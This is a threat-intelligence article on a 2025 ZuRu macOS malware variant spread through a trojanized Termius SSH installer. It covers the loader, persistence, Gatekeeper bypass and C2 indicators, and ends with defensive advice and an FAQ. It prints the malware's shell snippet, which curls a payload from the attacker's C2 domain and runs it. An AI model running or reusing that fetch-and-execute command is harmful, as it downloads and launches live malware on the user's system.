What is the new ZuRu malware variant targeting macOS through Termius SSH client in 2025?

In July 2025, cybersecurity researchers uncovered a dangerous new variant of the ZuRu malware targeting macOS users by embedding itself within a tampered installer of the Termius SSH client. This rogue version installs a stealthy payload that gives attackers remote control via a command-and-control (C2) server, bypassing Apple’s Gatekeeper security. The malware is particularly aimed at developers and IT professionals using third-party terminal tools. With capabilities like file exfiltration, shell execution, and persistence across reboots, this malware highlights the growing risks of using pirated or unverified productivity software.

  Security News & Threat Intelligence   Jul 24, 2025   53  Add to Reading List
What is the new ZuRu malware variant targeting macOS through Termius SSH client in 2025?

Table of Contents

What Is the New ZuRu Malware Variant and Why Is It Dangerous?

In July 2025, cybersecurity researchers uncovered a stealthy and highly sophisticated variant of the macOS.ZuRu malware family, which cleverly weaponizes the Termius SSH client—a trusted terminal emulator widely used by system administrators and developers. Unlike its predecessors, this ZuRu variant disguises itself as a genuine Termius installer but includes a malicious 25 MB Mach-O binary designed to compromise macOS developer systems and persist undetected.

This incident marks a growing trend in macOS-targeted attacks, where adversaries exploit trusted developer tools to infiltrate high-value engineering environments.

How Does ZuRu Infect macOS Systems?

Trojanized Installer Mimics Legitimate Application

The attack begins with a 248 MB fake disk image (.dmg) file that impersonates the authentic Termius SSH installer. Upon installation, it appears normal to the user but silently plants the malicious .localized loader within the Termius Helper bundle.

Legitimate Process Masking

To maintain normal user experience, the rogue installer launches the real .Termius Helper1, allowing the app to function as expected. Simultaneously, it executes .localized, a background process responsible for activating the embedded Khepri C2 (Command and Control) beacon.

How Does the Payload Maintain Persistence and Stealth?

Installation of Khepri Beacon

The .localized loader drops a file named Khepri under /tmp/.fseventsd, a typically overlooked temporary directory. This beacon contacts its C2 server every 5 seconds over port 53—mimicking DNS traffic to bypass firewalls and evade detection.

Gatekeeper Evasion via Ad-Hoc Signature

By replacing Termius’s original developer signature with an ad-hoc one, the malware bypasses Apple’s Gatekeeper protection. This sidesteps macOS’s usual notarization dialogs and trust validations, allowing execution without user prompts.

How Does the Malware Stay Self-Healing and Resilient?

Integrity Verification and Auto-Replacement Logic

Before launching the C2 beacon, the malware performs an MD5 hash check: 

EXPECTED_HASH="8ac593fbe69ae93de505003eff446424"
CURRENT_HASH=$(md5 -q /tmp/.fseventsd/Khepri)
[ "$CURRENT_HASH" != "$EXPECTED_HASH" ] && curl -s \
http://ctl01.macnavicat.com/update -o /tmp/.fseventsd/Khepri
chmod +x /tmp/.fseventsd/Khepri && /tmp/.fseventsd/Khepri &

If the current binary doesn't match the expected hash, it downloads a fresh copy from the C2 and silently restarts it. This ensures anti-virus solutions can't quarantine or delete the beacon permanently.

Who Is Being Targeted?

Focus on IT Staff and Software Engineers

The campaign is designed to compromise professionals who rely on third-party terminal tools like Termius. This includes:

  • DevOps engineers

  • Network administrators

  • macOS-based developers

  • Security researchers

  • Cloud architects

These groups are often privileged users with SSH access to production environments, making them lucrative targets for APT actors.

What Can the Malware Do Once Installed?

Once active, the Khepri beacon grants attackers:

  • File upload/download access

  • Shell command execution

  • Output capture from terminal sessions

  • Persistence across reboots

  • Stealth monitoring of system activity

This effectively transforms the infected system into a remote-controlled backdoor, capable of participating in broader lateral movement and data exfiltration.

Infrastructure and Attribution

Command and Control (C2) Infrastructure

  • Primary C2 domain: ctl01.macnavicat[.]com

  • Decoy domain: Uses Baidu for misdirection

  • C2 traffic frequency: Every 5 seconds

  • Protocol: DNS over port 53

Security firm Polyswarm linked this activity to earlier ZuRu campaigns based on infrastructure reuse, notably the C2 pattern and the use of Baidu as a decoy domain.

Technical Behavior Summary Table

Feature Details
Installer Size 248 MB
Embedded Malware .localized loader + Khepri beacon (25 MB Mach-O)
Installation Path /tmp/.fseventsd/Khepri
C2 Server ctl01.macnavicat[.]com
Port Used 53 (mimics DNS)
Gatekeeper Bypass Yes (ad-hoc code signature used)
Self-Healing Capability Yes (verifies and redownloads binary if altered)
Target Users macOS developers, DevOps, IT professionals
Persistence Mechanism Background daemon with reboot survivability

Why Is This Attack Significant?

This ZuRu malware evolution reflects several key concerns:

  • macOS-targeted malware is becoming more advanced and stealthy

  • Pirated or tampered developer tools are high-risk vectors

  • Gatekeeper's reliance on developer signatures is exploitable

  • Temporary directories like /tmp/.fseventsd are leveraged to hide payloads

  • DNS-based C2 traffic is hard to detect without deep inspection

How Can macOS Users Protect Themselves?

Best Practices for Developers and IT Teams

  1. Always download apps from official sources (e.g., App Store, verified vendor site).

  2. Verify code signatures manually using codesign or spctl.

  3. Avoid pirated or cracked productivity software.

  4. Monitor for suspicious outbound DNS traffic, especially to unknown domains.

  5. Deploy endpoint detection (EDR) tools that analyze behavior, not just signatures.

  6. Use file integrity monitoring to detect tampering in /tmp and other hidden paths.

  7. Harden Gatekeeper policies using spctl to allow only notarized apps.

Conclusion

The ZuRu malware family continues to evolve, using novel strategies like signed utility tampering, self-healing loaders, and DNS C2 obfuscation to bypass macOS’s security stack. With engineers and IT professionals increasingly targeted, the weaponization of developer tools like Termius should serve as a wake-up call for security teams.

Protecting macOS environments now demands zero trust approaches, vigilant threat hunting, and supply chain integrity verification for every downloaded tool—even the ones you trust most.

FAQs

What is the new ZuRu malware variant targeting macOS in 2025?

The latest ZuRu malware variant is embedded in a fake version of the Termius SSH client. Once installed, it provides attackers with persistent remote access to the compromised macOS system.

How does the ZuRu malware hide inside Termius?

The malware disguises itself within the Termius Helper bundle and uses a 25 MB Mach-O binary. It launches a hidden loader (.localized) while maintaining normal app behavior to evade user suspicion.

What is the role of the .localized loader?

The .localized binary acts as the main loader for the malware. It drops a C2 beacon named Khepri into /tmp/.fseventsd and maintains regular communication with the attacker.

What is the C2 server used in this campaign?

The command-and-control (C2) communication is established with ctl01.macnavicat[.]com, using DNS over port 53 for stealth. A Baidu domain is used as a decoy.

How does this malware bypass Apple’s Gatekeeper?

ZuRu replaces Termius’s developer signature with an ad-hoc signature, allowing it to run without triggering Gatekeeper’s notarization warnings.

Who are the main targets of this malware?

This campaign specifically targets developers, IT professionals, and engineers who rely on third-party terminals like Termius for SSH access.

What capabilities does this malware have?

It can run shell commands, transfer files, capture command output, and persist across reboots—giving attackers complete remote control.

How often does the malware beacon to the attacker?

The embedded beacon polls the operator every 5 seconds for instructions or payload updates.

What makes this variant harder to detect?

It has self-healing capabilities using MD5 hash checks. If tampered with, the malware silently replaces itself by fetching a fresh version from the C2 server.

What should users do to protect themselves?

Avoid downloading SSH clients or any productivity apps from unofficial sources. Use Apple notarized software, and scan installations with reliable antivirus tools.

What file path is used to store the beacon payload?

The beacon (Khepri) is dropped under the hidden directory /tmp/.fseventsd/ for stealth.

Why is port 53 used for C2 communication?

Using port 53 (typically used for DNS) helps the malware blend in with normal network traffic, evading simple firewall rules.

What is the size of the malicious Termius installer?

The rogue disk image is about 248 MB and mimics the real Termius installer closely to deceive users.

What kernel or OS versions are affected?

Any macOS version capable of running Termius and executing unsigned binaries is vulnerable if Gatekeeper is bypassed.

What is the hash verification logic used in the malware?

The loader verifies the integrity of the payload using MD5 hashing, and if mismatched, downloads a fresh payload from the attacker’s server.

How does this malware persist after reboot?

It sets itself up as a background daemon and reinitializes on system startup, maintaining continuous access.

What is the Khepri beacon?

Khepri is the main payload used for C2 communication, enabling remote command execution and data transfer.

Is this malware linked to previous campaigns?

Yes, it is linked to earlier ZuRu malware operations through its C2 patterns and infrastructure.

How was the malware discovered?

Security researchers at Polyswarm analyzed the behavior and domain patterns, tracing the infection back to the ZuRu malware family.

Can Gatekeeper block this threat?

Not effectively, because the malware uses an ad-hoc developer signature to bypass Apple’s default security checks.

What role does the SEEMOO Lab or Nexmon project play here?

None directly. However, the infrastructure used mimics advanced evasion and firmware tactics similar to academic research seen in other fields.

Is there an official patch for this threat?

As of now, there is no patch. Users are advised to avoid suspicious installers and use verified sources only.

Is antivirus software effective against this malware?

Some advanced antivirus tools with behavioral detection can identify such threats, but many static scanners may miss it due to self-healing mechanisms.

Does the malware affect iPhones or iPads?

No, it targets macOS systems, particularly developer and workstation environments.

What makes this malware advanced?

Its ability to self-heal, avoid detection, persist through reboots, and communicate stealthily via DNS-based C2 make it a high-risk threat.

How do attackers distribute the fake Termius installer?

Through pirated software sites, third-party download platforms, or phishing campaigns.

Can this malware spread to other devices?

Not directly, but it could be used as a pivot point to move laterally across a network.

What does ad-hoc code signing mean?

It refers to a self-generated certificate that bypasses Apple’s trusted developer checks, allowing unsigned code execution.

Where can users find more information or support?

Users can visit cybersecurity communities like Reddit’s r/macsysadmin or follow updates from malware analysts and Apple’s security bulletins.

Join Our Upcoming Class!

Tags